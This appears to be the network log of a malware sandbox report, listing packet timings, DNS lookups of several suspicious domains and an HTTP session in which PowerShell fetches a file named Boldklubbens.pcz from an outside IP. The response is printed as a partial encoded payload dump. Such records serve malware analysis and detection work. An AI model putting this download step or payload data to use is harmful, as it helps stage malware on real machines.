                                                                  Apr 24, 2024 06:36:59.108999014 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.109035015 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.109066963 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.109131098 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.109752893 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.109864950 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.109905005 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.109966040 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110068083 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110109091 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.110605955 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110640049 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110688925 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.110717058 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110811949 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.110865116 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.111463070 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.111480951 CEST8049743172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:36:59.111527920 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:36:59.779598951 CEST4974380192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:00.795698881 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:00.956222057 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:00.956337929 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:00.957370996 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.117930889 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.117993116 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118030071 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118067026 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118098974 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118132114 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118186951 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118218899 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.118249893 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.476094961 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.529396057 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.908282042 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908344030 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908385992 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908423901 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908428907 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.908466101 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908504963 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908533096 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.908561945 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.908653975 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908729076 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908795118 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.908807993 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.908967018 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909018040 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.909032106 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909105062 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909143925 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909154892 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.909246922 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909286022 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909300089 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.909326077 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909373045 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.909820080 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909909964 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.909960032 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.909996033 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.910037994 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.910084009 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.910777092 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.910815954 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.910876989 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.910933971 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911009073 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911099911 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.911700010 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911775112 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911829948 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.911854982 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911894083 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.911942959 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.912636042 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.912739992 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.912791967 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.912830114 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.912873983 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.912946939 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:01.913459063 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.913532972 CEST8049744172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:01.913592100 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:02.467065096 CEST4974480192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:03.483330011 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:03.643304110 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:03.643428087 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:03.643573046 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:03.803591967 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.181361914 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.181390047 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.181587934 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.510030031 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510088921 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510258913 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510272980 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.510302067 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510432005 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.510446072 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510484934 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510523081 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510545015 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.510618925 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.510721922 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.511018038 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.511058092 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.511198044 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.511223078 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.511235952 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.511334896 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.511974096 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.512012959 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.512069941 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.512171984 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.512209892 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.512319088 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.512892962 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513083935 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513122082 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513149023 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.513159990 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513283968 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.513631105 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513833046 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513875961 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.513911009 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.513919115 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.514029026 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.514688015 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.514727116 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.514847040 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.514858007 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.514897108 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.515019894 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.515362978 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.515674114 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.515732050 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.516036034 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516215086 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516336918 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.516561985 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516601086 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516706944 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.516730070 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516768932 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.516908884 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.517600060 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.517638922 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.517693996 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.517777920 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.517818928 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.517905951 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.518282890 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.518321991 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.518358946 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.518448114 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.518465996 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.518548965 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.519154072 CEST8049745172.67.152.117192.168.2.4
                                                                  Apr 24, 2024 06:37:04.519301891 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.519344091 CEST4974580192.168.2.4172.67.152.117
                                                                  Apr 24, 2024 06:37:04.679061890 CEST8049745172.67.152.117192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 24, 2024 06:36:11.523505926 CEST5949553192.168.2.41.1.1.1
                                                                  Apr 24, 2024 06:36:11.719934940 CEST53594951.1.1.1192.168.2.4
                                                                  Apr 24, 2024 06:36:27.390127897 CEST5021053192.168.2.41.1.1.1
                                                                  Apr 24, 2024 06:36:27.619734049 CEST53502101.1.1.1192.168.2.4
                                                                  Apr 24, 2024 06:36:40.279141903 CEST5253253192.168.2.41.1.1.1
                                                                  Apr 24, 2024 06:36:40.433859110 CEST53525321.1.1.1192.168.2.4
                                                                  Apr 24, 2024 06:36:46.920876026 CEST5565053192.168.2.41.1.1.1
                                                                  Apr 24, 2024 06:36:47.157552004 CEST53556501.1.1.1192.168.2.4
                                                                  Apr 24, 2024 06:36:55.234163046 CEST6077553192.168.2.41.1.1.1
                                                                  Apr 24, 2024 06:36:55.429088116 CEST53607751.1.1.1192.168.2.4
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Apr 24, 2024 06:36:11.523505926 CEST192.168.2.41.1.1.10x847dStandard query (0)www.tyaer.comA (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:27.390127897 CEST192.168.2.41.1.1.10x6d7aStandard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:40.279141903 CEST192.168.2.41.1.1.10xae62Standard query (0)www.oyoing.comA (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:46.920876026 CEST192.168.2.41.1.1.10xcacfStandard query (0)www.megabet303.lolA (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:55.234163046 CEST192.168.2.41.1.1.10xd300Standard query (0)www.theplays.shopA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Apr 24, 2024 06:36:11.719934940 CEST1.1.1.1192.168.2.40x847dNo error (0)www.tyaer.com47.91.88.207A (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:27.619734049 CEST1.1.1.1192.168.2.40x6d7aNo error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:40.433859110 CEST1.1.1.1192.168.2.40xae62No error (0)www.oyoing.com127.0.0.1A (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:47.157552004 CEST1.1.1.1192.168.2.40xcacfName error (3)www.megabet303.lolnonenoneA (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:55.429088116 CEST1.1.1.1192.168.2.40xd300No error (0)www.theplays.shop172.67.152.117A (IP address)IN (0x0001)false
                                                                  Apr 24, 2024 06:36:55.429088116 CEST1.1.1.1192.168.2.40xd300No error (0)www.theplays.shop104.21.74.5A (IP address)IN (0x0001)false
                                                                  • 87.121.105.163
                                                                  • www.tyaer.com
                                                                  • www.theplays.shop
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.44973187.121.105.163807556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 24, 2024 06:35:03.487893105 CEST174OUTGET /Boldklubbens.pcz HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                  Host: 87.121.105.163
                                                                  Connection: Keep-Alive
                                                                  Apr 24, 2024 06:35:03.790585041 CEST1289INHTTP/1.1 200 OK
                                                                  Date: Wed, 24 Apr 2024 04:35:03 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Last-Modified: Tue, 23 Apr 2024 10:52:27 GMT
                                                                  ETag: "72948-616c1598a50c0"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 469320
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Data Raw: 36 77 4a 5a 6c 65 73 43 76 43 4f 37 39 44 49 56 41 48 45 42 6d 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 68 6b 74 75 52 69 59 64 2f 48 72 41 68 4b 4c 63 51 47 62 67 65 6c 71 34 33 2f 58 36 77 4b 53 6f 75 73 43 7a 2f 32 42 38 61 36 30 39 78 6c 78 41 5a 74 78 41 5a 76 72 41 67 47 50 36 77 4b 78 36 62 6f 32 52 49 4a 34 63 51 47 62 36 77 4c 7a 6f 65 73 43 37 4b 2f 72 41 6d 32 46 4d 63 70 78 41 5a 74 78 41 5a 75 4a 46 41 74 78 41 5a 76 72 41 74 7a 38 30 65 4c 72 41 6a 78 59 63 51 47 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6e 4d 54 35 6f 44 66 4d 78 78 41 5a 76 72 41 76 69 2b 69 30 51 6b 42 4f 73 43 4a 35 62 72 41 73 32 44 69 63 50 72 41 68 50 59 36 77 4b 66 48 6f 48 44 6c 51 48 63 41 58 45 42 6d 2b 73 43 4b 78 71 36 39 6d 64 69 32 65 73 43 71 35 31 78 41 5a 75 42 38 72 65 66 37 33 68 78 41 5a 76 72 41 67 43 64 67 65 70 42 2b 49 32 68 36 77 4c 50 36 58 45 42 6d 33 45 42 6d 33 45 42 6d 2b 73 43 48 38 4a 78 41 5a 75 4c 44 42 44 72 41 6b 78 4a 63 51 47 62 69 51 77 54 63 51 47 62 63 51 47 62 51 6e 45 42 6d 2b 73 43 69 46 69 42 2b 72 54 34 42 41 42 31 31 75 73 43 5a 2b 46 78 41 5a 75 4a 58 43 51 4d 63 51 47 62 63 51 47 62 67 65 30 41 41 77 41 41 36 77 4c 63 59 6e 45 42 6d 34 74 55 4a 41 68 78 41 5a 76 72 41 70 7a 4d 69 33 77 6b 42 4f 73 43 4c 54 6c 78 41 5a 75 4a 36 2b 73 43 36 73 31 78 41 5a 75 42 77 35 77 41 41 41 44 72 41 70 38 65 36 77 49 4b 59 6c 50 72 41 6b 74 48 36 77 49 6c 56 32 70 41 63 51 47 62 36 77 4b 69 77 59 6e 72 63 51 47 62 63 51 47 62 78 34 4d 41 41 51 41 41 41 4a 43 79 41 33 45 42 6d 33 45 42 6d 34 48 44 41 41 45 41 41 4f 73 43 79 69 56 78 41 5a 74 54 36 77 4a 65 63 48 45 42 6d 34 6e 72 36 77 4b 4f 57 65 73 43 71 53 71 4a 75 77 51 42 41 41 44 72 41 6f 32 55 63 51 47 62 67 63 4d 45 41 51 41 41 36 77 4c 63 7a 6e 45 42 6d 31 50 72 41 74 67 46 63 51 47 62 61 76 39 78 41 5a 74 78 41 5a 75 44 77 67 58 72 41 71 57 79 63 51 47 62 4d 66 5a 78 41 5a 76 72 41 69 35 50 4d 63 6e 72 41 6e 76 48 36 77 49 78 71 6f 73 61 36 77 49 4d 63 6e 45 42 6d 30 46 78 41 5a 76 72 41 6a 36 36 4f 52 77 4b 64 66 4e 78 41 5a 74 78 41 5a 74 47 63 51 47 62 63 51 47 62 67 48 77 4b 2b 37 68 31 33 2b 73 43 78 70 6e 72 41 68 64 35 69 30 51 4b 2f 48 45 42 6d 33 45 42 6d 79 6e 77 63 51 47 62 63 51 47 62 2f 39 4a 78 41 5a 74 78 41 5a 75 36 74 50 67 45 41 4f 73 43 72 6e 56 78 41 5a 73 78 77 4f 73 43 66 7a 4e 78 41 5a 75 4c 66 43 51 4d 63 51 47 62 63 51 47 62 67 54 51 48 4f 68 34 4b 6e 33 45 42 6d 33 45 42 6d 34 50 41 42 48 45 42 6d 2b 73 43 49 57 51 35 30 48 58 6c 63 51 47 62 36 77 4c 4b 4b 34 6e 37 63 51 47 62 36 77 4c 43 76 50 2f 58 63 51 47 62 63 51 47 62 58 4a 76 54 47 2b 4d 6d 39 68 62 66 6e 2b 61 79 75 71 38 49 48 76 34 7a 64 79 34 34 53 34 4e 36 67 30 61 57 34 62 4b 66 2b 39 6b 47 62 6f 67 65 2b 38 2f 48 51 64 6d 66 79 37 61 6f 44 42 6a 35 75 2b 52 72 6a 76 31 61 42 35 38 2b 6a 55 36 38 76 74 32 50 56 72 74 71 42 35 2f 34 77 6d 71 75 58 4a 76 4c 48 6b 34 54 43 76 36 36 31 77 67 65 78 4b 52 4e 54 30 47 66 66 70 49 36 75 63 56 79 4b 70 2f 4c 73 59 74 55 44 42 37 54 4e 4c 76 56 50 4a 76 62 46 72 65 6b 43 35 38 36 6d 76 55 6d 62 36 4f 59
                                                                  Data Ascii: 6wJZlesCvCO79DIVAHEBm3EBmwNcJARxAZvrAhktuRiYd/HrAhKLcQGbgelq43/X6wKSousCz/2B8a609xlxAZtxAZvrAgGP6wKx6bo2RIJ4cQGb6wLzoesC7K/rAm2FMcpxAZtxAZuJFAtxAZvrAtz80eLrAjxYcQGbg8EEcQGbcQGbgfnMT5oDfMxxAZvrAvi+i0QkBOsCJ5brAs2DicPrAhPY6wKfHoHDlQHcAXEBm+sCKxq69mdi2esCq51xAZuB8ref73hxAZvrAgCdgepB+I2h6wLP6XEBm3EBm3EBm+sCH8JxAZuLDBDrAkxJcQGbiQwTcQGbcQGbQnEBm+sCiFiB+rT4BAB11usCZ+FxAZuJXCQMcQGbcQGbge0AAwAA6wLcYnEBm4tUJAhxAZvrApzMi3wkBOsCLTlxAZuJ6+sC6s1xAZuBw5wAAADrAp8e6wIKYlPrAktH6wIlV2pAcQGb6wKiwYnrcQGbcQGbx4MAAQAAAJCyA3EBm3EBm4HDAAEAAOsCyiVxAZtT6wJecHEBm4nr6wKOWesCqSqJuwQBAADrAo2UcQGbgcMEAQAA6wLcznEBm1PrAtgFcQGbav9xAZtxAZuDwgXrAqWycQGbMfZxAZvrAi5PMcnrAnvH6wIxqosa6wIMcnEBm0FxAZvrAj66ORwKdfNxAZtxAZtGcQGbcQGbgHwK+7h13+sCxpnrAhd5i0QK/HEBm3EBmynwcQGbcQGb/9JxAZtxAZu6tPgEAOsCrnVxAZsxwOsCfzNxAZuLfCQMcQGbcQGbgTQHOh4Kn3EBm3EBm4PABHEBm+sCIWQ50HXlcQGb6wLKK4n7cQGb6wLCvP/XcQGbcQGbXJvTG+Mm9hbfn+ayuq8IHv4zdy44S4N6g0aW4bKf+9kGboge+8/HQdmfy7aoDBj5u+Rrjv1aB58+jU68vt2PVrtqB5/4wmquXJvLHk4TCv661wgexKRNT0GffpI6ucVyKp/LsYtUDB7TNLvVPJvbFrekC586mvUmb6OY
                                                                  Apr 24, 2024 06:35:03.790627956 CEST1289INData Raw: 68 62 76 33 66 6d 7a 51 36 59 74 75 78 37 78 4d 37 4c 76 76 62 76 58 62 54 7a 4e 55 41 35 4f 77 6e 6a 6f 65 67 52 4b 41 48 77 71 66 54 34 69 4f 63 5a 4b 2b 6a 6b 52 63 6e 2f 45 46 6e 35 76 54 47 2b 4c 6f 79 46 4d 43 2b 34 4d 61 51 68 38 4b 6e 77
                                                                  Data Ascii: hbv3fmzQ6Ytux7xM7LvvbvXbTzNUA5OwnjoegRKAHwqfT4iOcZK+jkRcn/EFn5vTG+LoyFMC+4MaQh8KnwLVj0yzg0aeOh6PVGn2JnA+HoPafvdlKz4e/FsgkY/7Ox4K96TAltoC+eJahhoKFmcCsi0ALymyXEj/qb7EDzju4Q6afFLOkb7dMkaxUxYl9kIoNtILuJs6l0+3sVMW+bvlT12AHyhqZPYKLT4egxryHgqf03/hmzp
                                                                  Apr 24, 2024 06:35:03.790666103 CEST1289INData Raw: 76 74 4b 36 2f 79 44 6a 32 75 58 6b 5a 44 66 30 6f 65 37 31 52 46 52 62 77 33 5a 66 54 70 51 6f 36 2b 57 43 2f 70 58 73 41 56 4c 35 73 62 53 44 5a 79 64 4f 70 65 66 6c 6a 67 65 43 69 58 42 74 50 39 76 62 61 46 4f 70 57 6c 43 69 32 67 50 4a 47 70
                                                                  Data Ascii: vtK6/yDj2uXkZDf0oe71RFRbw3ZfTpQo6+WC/pXsAVL5sbSDZydOpefljgeCiXBtP9vbaFOpWlCi2gPJGpMu+kiHdOBi2gjxr82u9k7hatYg4AHHbmgf0KsChqxqt1rDfZuLeGUyrtapWdKcaYVjGFqrB6poVs5N7bqT3KaN1w+OQzOs1UeyDZHtGyf+OHD+SYe0LIUprBNsc3pgCIeyb4hz+SfyUY2LwMWMfCzqz8waulEZLf2
                                                                  Apr 24, 2024 06:35:03.790726900 CEST1289INData Raw: 67 70 70 57 56 48 56 6c 47 43 6b 32 36 6d 44 64 2b 48 30 4e 4e 54 51 46 4d 6c 44 6e 72 64 56 4e 49 66 6f 5a 73 36 54 4c 42 39 48 50 41 30 48 76 6a 51 75 77 58 4a 6e 38 6a 50 45 6d 6e 48 7a 36 61 58 36 70 59 71 67 32 77 61 79 32 4d 57 42 48 46 7a
                                                                  Data Ascii: gppWVHVlGCk26mDd+H0NNTQFMlDnrdVNIfoZs6TLB9HPA0HvjQuwXJn8jPEmnHz6aX6pYqg2way2MWBHFz9PSoOk5J+6aXM4kM+WXHuqykOPdxAJbaEzErosGz+tYfC2Fwlq3wJuXHXJ/1VcFEgxp6Hwqf9n1APNZiqGgEJevEJOJRW00ccLMrQgCbhjopTVd5rZ+KD0J6+JePJzseCidF+NetNRlZrjoeCp86HgqfOh4KnzoeC
                                                                  Apr 24, 2024 06:35:03.790780067 CEST1289INData Raw: 77 67 77 67 4a 38 62 67 56 71 53 6c 2b 48 42 44 79 38 4f 56 41 55 57 75 6e 56 54 57 53 52 59 74 75 45 42 2b 53 72 4c 76 76 68 30 4b 71 54 6f 74 65 38 67 68 71 57 4c 4d 76 4c 53 33 32 30 78 65 42 34 66 38 46 6b 6e 49 4e 6a 33 58 43 67 52 34 76 49
                                                                  Data Ascii: wgwgJ8bgVqSl+HBDy8OVAUWunVTWSRYtuEB+SrLvvh0KqTote8ghqWLMvLS320xeB4f8FknINj3XCgR4vIGMSZkzxmkboIrgqwmA30Y8cRwUrrUAZf9yDw2N2a5NJ58bWDvt5sJiZeD9x+h79BFOle85YJxbcVqkOhfKsDJrgnmtSXjkET58+u+nVm9y7Ki6tR9pqHj46e+ULt10gSUdd6LvZPUz1rYtozXF1CrvZ1WedX4OgMm
                                                                  Apr 24, 2024 06:35:03.790817976 CEST1289INData Raw: 57 73 54 4e 43 50 6c 63 65 74 58 4a 35 4b 2b 74 55 77 46 68 51 55 61 73 7a 44 63 44 78 4c 76 70 53 68 4a 32 61 46 30 55 68 39 30 4c 6e 7a 72 53 32 74 57 31 76 6b 79 2b 6e 43 7a 52 4a 36 50 2f 45 30 4f 6c 6f 66 6b 6b 2b 34 7a 6b 67 52 6e 32 42 43
